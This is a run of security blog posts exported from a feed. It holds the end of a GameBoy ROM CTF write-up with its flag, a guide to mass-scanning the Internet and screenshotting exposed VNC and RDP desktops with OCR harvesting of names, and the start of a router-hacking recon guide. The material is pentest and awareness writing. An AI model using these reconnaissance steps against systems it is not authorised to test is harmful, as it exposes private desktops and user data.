We were about to create a character table when, after switching the Codec to 2bpp planar (GameBoy's native Codec), we found something interesting:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsicnbNAzxK8EgwgqAb3LXPLa6V_sUxtwqHRN6l0n0gRrf2WFRt79wIzFlF7AsVzkZOTkjr3bgqC2l-2eJJafkn84sjkg_AmG0LV0c2KRJShSHBT5SFdlpZ8snHenLovamO5biNzaOGXu/s1600/tlayer2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsicnbNAzxK8EgwgqAb3LXPLa6V_sUxtwqHRN6l0n0gRrf2WFRt79wIzFlF7AsVzkZOTkjr3bgqC2l-2eJJafkn84sjkg_AmG0LV0c2KRJShSHBT5SFdlpZ8snHenLovamO5biNzaOGXu/s1600/tlayer2.png" height="313" width="320" /></a></div>
<br />
After some offset adjustment (using +, -, Shift + left and Shift + right) we got this image:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkCNu9UDrC18FMBnFEyVqRd3j92h9lZb7SnKzIprYvk0J2xrNCK4_TtwZ1RMWfJvwvP3PsIpTnTc7BRgpKwH7dkUNZV2wrckujq80hmv9wmPGt1XMdL52n77yZL1lz34NYzf0dDmib4iZJ/s1600/tlayer3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkCNu9UDrC18FMBnFEyVqRd3j92h9lZb7SnKzIprYvk0J2xrNCK4_TtwZ1RMWfJvwvP3PsIpTnTc7BRgpKwH7dkUNZV2wrckujq80hmv9wmPGt1XMdL52n77yZL1lz34NYzf0dDmib4iZJ/s1600/tlayer3.png" height="146" width="320" /></a></div>
<br />
We submitted the key "tkCXDtheQDNRN", but it wasn't accepted. I wanted to confirm that those tiles were disposed in a linear way, so I kept analyzing the ROM.<br />
<br />
The GameBoy's screen has a resolution of 20x18 tiles. In order to check if the order of the tiles (and the flag) was correct, I performed a relative search using <a href="https://code.google.com/p/ricardojricken/">Darkl0rd's Monkey-Moore</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyq6srfw9ACbBtvP6pso7grV7qlS2sR2ooDcPQD-vDtypvjDqvthSVABwkxnmyskQqYNDLlQEh7GLLkmMiSiClj-m4VHG3hR7ePQ7_87xm8EIleOnQ68dQGeJwadVAlUL1kCJdVFM4YUw1/s1600/moore.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyq6srfw9ACbBtvP6pso7grV7qlS2sR2ooDcPQD-vDtypvjDqvthSVABwkxnmyskQqYNDLlQEh7GLLkmMiSiClj-m4VHG3hR7ePQ7_87xm8EIleOnQ68dQGeJwadVAlUL1kCJdVFM4YUw1/s1600/moore.PNG" height="297" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Let's imagine a grid containing the tiles for the key "tkCXDtheQDNRN" sequentially. Considering the first tile as an A, the second one would be B, the third one C and so on. After 20 bytes (the screen width) there should be something like a line break: that's why I performed a relative search for ABCDEFGHIJKLMNOPQRST*UVWXYZ.<br />
<br />
If we go to the ROM's offset 0x0965 using an Hex Editor, we find out that this is indeed the section responsible for displaying the tiles:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDsq3oEuI9VEZaTuH6ub3ZqYDDJIf7y-cmUO5hOp4GycbxtJmt0gwNe0Bqc0uyuwpzzcz_KfjkLKIZPVlRsm8_mRSn65vCCGRtBy8QAZuE_vD-QSXPy5g3sEPrUkonBpWf6kRDBR7whv0S/s1600/hex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDsq3oEuI9VEZaTuH6ub3ZqYDDJIf7y-cmUO5hOp4GycbxtJmt0gwNe0Bqc0uyuwpzzcz_KfjkLKIZPVlRsm8_mRSn65vCCGRtBy8QAZuE_vD-QSXPy5g3sEPrUkonBpWf6kRDBR7whv0S/s1600/hex.PNG" height="296" width="640" /></a></div>
<br />
Let's compare it with the emulator's BGMAP when displaying the key:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0poB_VAeAmGeFL65RgdXEixTLfsmwgQG-0au8eo9D0a9nl2tvi5uZ3fA0kBQa-u27NckI04K3d8ShMs_iONoY1LFrtsbGeePhsrykociH7Y6PlYBr_W3xkFJP0sU05NWDHPlvnP_McSmb/s1600/hexview.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0poB_VAeAmGeFL65RgdXEixTLfsmwgQG-0au8eo9D0a9nl2tvi5uZ3fA0kBQa-u27NckI04K3d8ShMs_iONoY1LFrtsbGeePhsrykociH7Y6PlYBr_W3xkFJP0sU05NWDHPlvnP_McSmb/s1600/hexview.PNG" height="114" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5etnQANHu5YtEpb20V5mmyEiVUu5AziB7hJzbBIX1rE6iYwFz1wkIaBdv2Q3n0D8KG72CUUmM2Mf3WWHqJIAytNcgsZQ5UtZ50B-Kp4iOWDBUSd7C6xE356WzPncneJbyEvVGdenmeadT/s1600/bug.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5etnQANHu5YtEpb20V5mmyEiVUu5AziB7hJzbBIX1rE6iYwFz1wkIaBdv2Q3n0D8KG72CUUmM2Mf3WWHqJIAytNcgsZQ5UtZ50B-Kp4iOWDBUSd7C6xE356WzPncneJbyEvVGdenmeadT/s1600/bug.PNG" height="303" width="400" /></a></div>
<br />
I'm not sure if this was intentional, but there's something strange on this key display screen. The first tile for the char "t" (0x15) is followed by the first tile from "k" (0x16), which is followed by the first tile from "C" (0x17) until we reach the "N" (0x28). There's a break at offset 0x0979 (0x00) and the second half for these tiles (0x29 0x30 0x31 ... 0x3C) ends with a 0x3D instead of the usual 0x00. We can see this clearly on the screenshot above, as the tile highlighted by the mouse pointer (0x3D) is off the limits.<br />
<br />
Anyway, we apparently had the correct flag but we took some time to figure out that the 6th letter was a "J" and not a "t". One member from our team figured that out and submitted the correct key "tkCXDJheQDNRN".<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQTUvkXxySqB2ZNl-FROCNWG_LBu-7gQYeCUebpMbKfWGZyAXM6GHc3WE_iMAQB_SXqpbn_YBmfa7CrFEeoGQ2pVkUllYsUuUE7eO8OvYXr4tov7tUN4BgLhRw8a2lbyjN-ffl7Dy8yUWi/s1600/w00t.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQTUvkXxySqB2ZNl-FROCNWG_LBu-7gQYeCUebpMbKfWGZyAXM6GHc3WE_iMAQB_SXqpbn_YBmfa7CrFEeoGQ2pVkUllYsUuUE7eO8OvYXr4tov7tUN4BgLhRw8a2lbyjN-ffl7Dy8yUWi/s1600/w00t.PNG" height="218" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
There are other solutions to this challenge, like <a href="http://tasteless.se/2014/10/hack-lu-ctf-2014-at-gunpoint/">this one from Tastless</a>. I'm still waiting for a write up from someone who actually reversed and inputted the secret combination. Anyway, none of them are going to be as elegant as the one from <a href="https://twitter.com/angealbertini">@angealbertini</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkKBom4_eWWbUQhVmLi4VoWES3HQDhTztEifIHSnn7UDKOTIaIsJNRr214jov4FBx2rJWedZPzF9KVvb5ViJRA-AOdnwk9YQl3XghhWK-mLP86iesDW-U2WWb-sgjVsUKez0uu_8IHGZY_/s1600/ange.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkKBom4_eWWbUQhVmLi4VoWES3HQDhTztEifIHSnn7UDKOTIaIsJNRr214jov4FBx2rJWedZPzF9KVvb5ViJRA-AOdnwk9YQl3XghhWK-mLP86iesDW-U2WWb-sgjVsUKez0uu_8IHGZY_/s1600/ange.PNG" height="75" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRt_InGFiU6kXjdJSXUkcf_nTvp3oilsukUXgeKDp2ggy4T750AizLm62MZSzS-af-meO8XxNHQV6C-BcvSBCGAmoX4T56t_5nSEbri56HWsr0hT_80HiAAJJbcfbp7qDBrR63D3Ybv7LL/s1600/ange2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRt_InGFiU6kXjdJSXUkcf_nTvp3oilsukUXgeKDp2ggy4T750AizLm62MZSzS-af-meO8XxNHQV6C-BcvSBCGAmoX4T56t_5nSEbri56HWsr0hT_80HiAAJJbcfbp7qDBrR63D3Ybv7LL/s1600/ange2.PNG" height="212" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0tag:blogger.com,1999:blog-3296471108082693838.post-30919076036102452982014-08-17T13:00:00.000-03:002014-08-22T01:56:46.617-03:00Scan the Internet & Screenshot All the ThingsDuring Defcon 22, <a href="https://twitter.com/erratarob">@ErrataRob</a>, <a href="https://twitter.com/paulm">@paulm</a> and <a href="https://twitter.com/viss">@Viss</a> (mass)scanned the Internet and presented some <a href="https://www.defcon.org/html/defcon-22/dc-22-speakers.html#Graham">Tips, Tricks and Results</a>. Lots of people confronted <a href="https://twitter.com/viss">@Viss</a> after he posted some <a href="https://twitter.com/Viss/media">VNC screenshots on his Twitter timeline</a>. He posted a <a href="http://atenlabs.com/blog/scanning-the-whole-internet/">follow-up article on his blog</a> and Kashmir Hill, from Forbes, wrote an <a href="http://www.forbes.com/sites/kashmirhill/2014/08/13/so-many-pwns/">article</a> about the exposed VNC services.<br />
<br />
Internet scanning isn't new anymore and people are still surprised with these results. For this post, I'll share some techniques I commonly use to map and screenshot several Internet services during pentest engagements. All this could easily be adapted for other protocols and services, so let's start to Screenshot All the Things.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieXs8_k_zz-DzMaSIzz9s0kqOwwIOV2SDzDG_FZC6EqshRaBTu3OUjU7F3d-qgiZt4jjigRtviZipPfTUrtb4pcq0ik96w7ubY_kWXBJAB3-YdtLzsEOAPahOgI-etsLjeBvlsgufHma-b/s1600/16284207.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieXs8_k_zz-DzMaSIzz9s0kqOwwIOV2SDzDG_FZC6EqshRaBTu3OUjU7F3d-qgiZt4jjigRtviZipPfTUrtb4pcq0ik96w7ubY_kWXBJAB3-YdtLzsEOAPahOgI-etsLjeBvlsgufHma-b/s1600/16284207.jpg" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<b>VNC</b><br />
<br />
The easiest way to snapshot these services is to use preexisting tools and script/mod them according to your needs. In order to take screenshots from VNC, I generally use <a href="https://kanaka.github.io/noVNC/">noVNC</a> (an HTML5 VNC client) and a <a href="http://www.binarytides.com/take-webpage-screenshot-from-command-line-in-ubuntu-linux/">command line utility to capture the WebKit's rendering of a web page</a>.<br />
<br />
The process is pretty straightforward:<br />
<br />
1 - Clone the noVNC project from <a href="https://github.com/kanaka/noVNC">github</a>:<br />
<br />
<div class="code">
git clone git://github.com/kanaka/noVNC</div>
<br />
2 - Start the mini-webserver and specify the location of the VNC server you want to screenshot:<br />
<br />
<div class="code">
./noVNC/utils/launch.sh --vnc 192.168.1.142:5900</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC7ejH7m87BE9RsLfgVrQF_sQwS7tkX4Qvxua2FMLVSUmkazq1lTeYqBLmVdoEGCmY8Ub1UrF3QcQG3Q2sEKEubK_O5lEpXXiv_eelgHfghNImY64ZoC4789QgpMe_uRNeqAoNhwPJqM73/s1600/111.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC7ejH7m87BE9RsLfgVrQF_sQwS7tkX4Qvxua2FMLVSUmkazq1lTeYqBLmVdoEGCmY8Ub1UrF3QcQG3Q2sEKEubK_O5lEpXXiv_eelgHfghNImY64ZoC4789QgpMe_uRNeqAoNhwPJqM73/s1600/111.png" height="261" width="400" /></a></div>
<br />
3 - Take a <a href="http://www.binarytides.com/take-webpage-screenshot-from-command-line-in-ubuntu-linux/">webpage screenshot</a> from command line using <a href="http://cutycapt.sourceforge.net/">CutyCapt</a>, for example:<br />
<br />
<div class="code">
cutycapt --url="http://127.0.0.1:6080/vnc_auto.html" --javascript=on --out=vnc.png --delay=3000</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCKL3THMzrVjNTb-hjYUUvxhgMhLL6f_BdE2wJvZJzEY-llWNP_tasjiqcZdoByaeritHuXfr4fmvj18f2n9TuyhoYg1Qmt-_5ltacOo0011n-ZZrXINPIvrRXgJeMPJNUprxBfjuyAyJj/s1600/Screenshot+from+2014-08-16+19%5E6%5E%01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCKL3THMzrVjNTb-hjYUUvxhgMhLL6f_BdE2wJvZJzEY-llWNP_tasjiqcZdoByaeritHuXfr4fmvj18f2n9TuyhoYg1Qmt-_5ltacOo0011n-ZZrXINPIvrRXgJeMPJNUprxBfjuyAyJj/s1600/Screenshot+from+2014-08-16+19%5E6%5E%01.png" height="345" width="400" /></a></div>
<br />
4 - Profit!!!<br />
<br />
Now all you have to do is masscan the target for ports 5900-5910 (used by VNC), save the results on a text file and create a simple script to take the screenshots. You can also try <a href="https://github.com/shamun/vncsnapshot">vncsnapshot</a>, used by <a href="https://twitter.com/paulm">@paulm</a> during his <a href="https://github.com/PaulMcMillan/toorcon_2013">Toorcon 2013 talk</a>.<br />
<br />
<b>RDP</b><br />
<br />
My tool of choice for taking snapshots of RDP services is <a href="http://www.remotespark.com/">Spark View</a>. There's an <a href="http://www.remotespark.com/html5.html">HTML5 version</a> for the tool available <a href="http://www.remotespark.com/html5.html">here</a> and the process is quite similar to the VNC one:<br />
<br />
1 - Download and install Spark View for <a href="http://www.remotespark.com/view/SparkGateway-installer.exe">Windows </a>or <a href="http://www.remotespark.com/view/SparkGateway.zip">Linux</a>. Follow the procedure from the <a href="http://www.remotespark.com/view/AdminManual.pdf">Admin Manual</a>, install J2SE JDK, set the JAVA_HOME environment variable, extract, configure and compile the utils from commons-daemon-native.tar.gz. On Debian derivatives, you may need to edit <i>SparkGateway.sh</i> and change the source function library to "/lib/lsb/init-functions".<br />
<br />
2 - Start the service (./SparkGateway.sh start) and test it by accessing your local IP on port 80. Remote Spark provides a live demo for their solution <a href="http://www.remotespark.com:8080/">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX0jB_nQlKeex36V56UjjNPkQdtgyVsAEvs07j0uxBuE_5fB-m8OMsiNS1igeYy8q_tTcnKOvTlTu9sqfxfevkusqvOTf-jky8fJgejlwmK0Q9oZlMcKOeAbYMw0NxjjTqgUmp5pic127o/s1600/rdp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX0jB_nQlKeex36V56UjjNPkQdtgyVsAEvs07j0uxBuE_5fB-m8OMsiNS1igeYy8q_tTcnKOvTlTu9sqfxfevkusqvOTf-jky8fJgejlwmK0Q9oZlMcKOeAbYMw0NxjjTqgUmp5pic127o/s1600/rdp1.png" height="244" width="320" /></a></div>
<br />
3 - Specify the RDP server settings on the querystring and take a webpage screenshot using a command line tool. I'm going to use <a href="http://phantomjs.org/">phantomjs</a> + <a href="https://gist.github.com/sbehrens/11384864">url-to-image.js</a> for this example:<br />
<br />
<div class="code">
phantomjs url-to-image.js "http://127.0.0.1/rdpdirect.html?gateway=127.0.0.1&server=192.168.1.189&width=800&height=600&color=16" rdp.png 800 600</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguqSI4gRzzUCaVS7vVxazJr5JAQ2KNyUVhKX7XFxKXiK9NfZfmQGpUdZEghqSG1vw_jCG1PaHPXUUv33FkIc2gzopLQLKvdMF6cz7wAjQhnpnV2J59JgIC-HXMl5EfNGaJDlFJDxXLw9VC/s1600/rdp2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguqSI4gRzzUCaVS7vVxazJr5JAQ2KNyUVhKX7XFxKXiK9NfZfmQGpUdZEghqSG1vw_jCG1PaHPXUUv33FkIc2gzopLQLKvdMF6cz7wAjQhnpnV2J59JgIC-HXMl5EfNGaJDlFJDxXLw9VC/s1600/rdp2.png" height="366" width="400" /></a></div>
<br />
4 - Profit!!!<br />
<br />
Some commercial tools like Nessus also connects to RDP services and <a href="http://www.tenable.com/blog/nessus-52-released">captures screenshots</a>. Taking screenshots from RDP services is very useful to fingerprint operating systems and to map/identify domains and users on the network. I always output these images to <a href="https://help.ubuntu.com/community/OCR">OCR</a> tools like <a href="https://code.google.com/p/tesseract-ocr/">tesseract</a> and <a href="http://jocr.sourceforge.net/">gocr</a> in order to generate wordlists and compile other useful data:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_H2-BUlhw7RVJ5baXEutK7ZA8S0xdggc5dtCLDu4q2ZgDbx2TsSLIs1xXIue1EKuhMu0L-BaYZVyHifS7j4FIRmXlYzzAwDN9ilELi_S1xCUGc-sTmziyOipzATfoVTbGmzWvoUJvSumh/s1600/ocr1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_H2-BUlhw7RVJ5baXEutK7ZA8S0xdggc5dtCLDu4q2ZgDbx2TsSLIs1xXIue1EKuhMu0L-BaYZVyHifS7j4FIRmXlYzzAwDN9ilELi_S1xCUGc-sTmziyOipzATfoVTbGmzWvoUJvSumh/s1600/ocr1.png" height="260" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">RDP screenshot</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdGE6BMbunozSBgNEnTf0EFcOLzQw1eoi-4xDJwvwdMdCgyDAfabv0CS-6k5d7oWM_u-I5upEwUqp66W3VRh2kIKpKTpu1c12ekY6L9O9yNNuBt-IVvfctyFL1qAgrRwyDSAJRrgHLq5J/s1600/ocr2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdGE6BMbunozSBgNEnTf0EFcOLzQw1eoi-4xDJwvwdMdCgyDAfabv0CS-6k5d7oWM_u-I5upEwUqp66W3VRh2kIKpKTpu1c12ekY6L9O9yNNuBt-IVvfctyFL1qAgrRwyDSAJRrgHLq5J/s1600/ocr2.png" height="157" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">gocr output</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjakLIQy_mgCme04C9iISLNwgcNsVpwUHuzmpBUeFEIpTF5IZX4SMdV0UHp9kaDFj7I63PaGREDWg4ehc5Te56XjX5TB9tA83ckiueFqukZZOGkvN_Y1ggscOofKRDq2dYGVQF-PEtfxl_R/s1600/ocr3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjakLIQy_mgCme04C9iISLNwgcNsVpwUHuzmpBUeFEIpTF5IZX4SMdV0UHp9kaDFj7I63PaGREDWg4ehc5Te56XjX5TB9tA83ckiueFqukZZOGkvN_Y1ggscOofKRDq2dYGVQF-PEtfxl_R/s1600/ocr3.png" height="185" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">tesseract output</td></tr>
</tbody></table>
<br />
<b>HTTP</b><br />
<b><br /></b>
There's nothing much to be said about Web Services screenshots. There are lots of posts covering this topic and lots of different tools, including an Nmap plugin. Some references:<br />
<br />
- <a href="http://blog.spiderlabs.com/2012/06/using-nmap-to-screenshot-web-services.html">Using Nmap to Screenshot Web Service (http-screenshot.nse</a>)<br />
- <a href="http://wiki.securityweekly.com/wiki/index.php/Episode295">PaulDotCom Security Weekly 295 - Tech Segment</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSlgHO66w1Un_galDlXTqLyKyVB5nadtMyQHgMp1lViYWzjuK8j9caCtVLJVMJNZc_Rc-UQm1rWq6gHjL-BJo9xXZwEp2XuNZgK-DvvKPzl6N0iaNMgrJOUUF1-rP3NkK_kUmEVoEfYxEj/s1600/nmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSlgHO66w1Un_galDlXTqLyKyVB5nadtMyQHgMp1lViYWzjuK8j9caCtVLJVMJNZc_Rc-UQm1rWq6gHjL-BJo9xXZwEp2XuNZgK-DvvKPzl6N0iaNMgrJOUUF1-rP3NkK_kUmEVoEfYxEj/s1600/nmap.png" height="143" width="400" /></a></div>
<br />
- <a href="https://www.christophertruncer.com/eyewitness-triage-tool/">EyeWitness - A Web Application Triage and Info-Gathering Tool</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75LTnpPvsHRCxZOePJ6YJb9n9s5WfDSfCNRzYd-5nrmvRWesODJKSISBDHiIBc85royBZI-_kIC_vLYJqhWCFj5X-1Bfiy3igjJDFsEuKf_gaod_rbma-sFRxc3WXp-UDsggfZKMdk2mP/s1600/EyeWitnessUI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75LTnpPvsHRCxZOePJ6YJb9n9s5WfDSfCNRzYd-5nrmvRWesODJKSISBDHiIBc85royBZI-_kIC_vLYJqhWCFj5X-1Bfiy3igjJDFsEuKf_gaod_rbma-sFRxc3WXp-UDsggfZKMdk2mP/s1600/EyeWitnessUI.png" height="131" width="400" /></a></div>
<br />
<b>Conclusion</b><br />
<b><br /></b>
I find these tips very useful to get a better view of network services. Now that reporters are getting a pretty good idea from the attackers perspective, you have no excuse to leave your <a href="https://twitter.com/semibogan/status/499787869066498048">curtains exposed</a> to the Internet without a VNC password. It's also important to practice safe computing, changing default passwords and enabling <a href="https://en.wikipedia.org/wiki/Network_Level_Authentication">Network Level Authentication</a> for RDP services.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2M98ugbUCat192BjagfCJ7lKUaBj9JIWa7ara-JjWR4vIQ4TqZzUArLxbPagn_43WS4Yr5yssSeUrVuhDEfwFOAEElcr6hqzb75LxCFWG2iNmidP_zTbhnoiqsv350yB1uoR3FHaZf4K6/s1600/movie.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2M98ugbUCat192BjagfCJ7lKUaBj9JIWa7ara-JjWR4vIQ4TqZzUArLxbPagn_43WS4Yr5yssSeUrVuhDEfwFOAEElcr6hqzb75LxCFWG2iNmidP_zTbhnoiqsv350yB1uoR3FHaZf4K6/s1600/movie.PNG" height="383" width="400" /></a></div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com4tag:blogger.com,1999:blog-3296471108082693838.post-8598191646440899862014-07-17T11:03:00.000-03:002014-07-21T11:49:10.685-03:00Hacking Asus RT-AC66U and Preparing for SOHOpelesslyBroken CTFSo it's finally July, time to pack for DEFCON, follow <a href="https://twitter.com/defconparties">@defconparties</a> on Twitter and decide which <a href="http://defcne.net/villages/22">villages</a> to visit and which <a href="https://www.defcon.org/html/defcon-22/dc-22-schedule.html">talks</a> to attend.<br />
<br />
There's a new hacking competition this year called <a href="http://sohopelesslybroken.com/">SOHOpelesslyBroken</a>, presented by ISE and EFF. The objective on <a href="http://sohopelesslybroken.com/track0.php">Track 0</a> is to demonstrate previously unidentified vulnerabilities in off-the-shelf consumer wireless routers. <a href="http://sohopelesslybroken.com/track1.php">Track 1</a> will hold a live CTF for the duration of DEFCON. CTFs are always fun and this contest involves hacking real embedded devices, what makes it even more fun.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0AIOg6mrk7OiBCMvNP6Ioj0HtU9O48MaW0tS475ge8K0Pph0fOdZ7ZgGvstrwnyhOlkSBlLH0CU8tDaQyFZCJGWRser-m01Fx8d1hfYDZOaAAjG5vqvOYjAndt4g3qdqoloEiPgbrxs7H/s1600/meme2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0AIOg6mrk7OiBCMvNP6Ioj0HtU9O48MaW0tS475ge8K0Pph0fOdZ7ZgGvstrwnyhOlkSBlLH0CU8tDaQyFZCJGWRser-m01Fx8d1hfYDZOaAAjG5vqvOYjAndt4g3qdqoloEiPgbrxs7H/s1600/meme2.png" height="304" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Yes, that's my workstation =P</td></tr>
</tbody></table>
I'm particularly interested on the <a href="https://openwireless.org/">EFF Open Wireless Router</a>, but they didn't disclose details about the device yet. According to the <a href="http://sohopelesslybroken.com/track0.php">event rules</a>, the <a href="https://wikidevi.com/wiki/ASUS_RT-AC66U">ASUS RT-AC66U</a> (HW Ver. A2) [Version 3.0.0.4.266] is one of the possible targets. As I had a spare RT-AC66U at home, I decided to write a quick guide for everyone interested in participating in this <strike>competition</strike> CTF.<br />
<br />
<b>recon</b><br />
<br />
The first thing to do is to find the firmware and its source code. Hopefully, Asus RT-AC66U is GPL'ed and we can easily find its source online. The version used for the contest is an old one, from 2012. In order to perform a better analysis, we are going to grab the sources and the firmware from v3.0.0.4.266 and v3.0.0.4.376.1123 (the most recent one as of this writing).<br />
<br />
<ul>
<li><a href="http://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/FW_RT_AC66U_VER3004266.zip">Asus RT-AC66u v3.0.0.4.266 - Firmware</a></li>
<li><a href="http://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/GPL_RT_AC66U_VER3004266.zip">Asus RT-AC66u v3.0.0.4.266 - Source Code</a></li>
<li><a href="http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043761123.zip">Asus RT-AC66u v3.0.0.4.376.1123 - Firmware</a></li>
<li><a href="http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC66U/GPL_RT-AC66U_30043761123.zip">Asus RT-AC66u v3.0.0.4.376.1123 - Source Code</a></li>
</ul>
<br />
Many firmware versions were published between these two releases, we can review the changelogs to find security issues:<br />
<br />
<ul>
<li><a href="http://www.asus.com/Networking/RTAC66U/HelpDesk_Download/">http://www.asus.com/Networking/RTAC66U/HelpDesk_Download</a></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
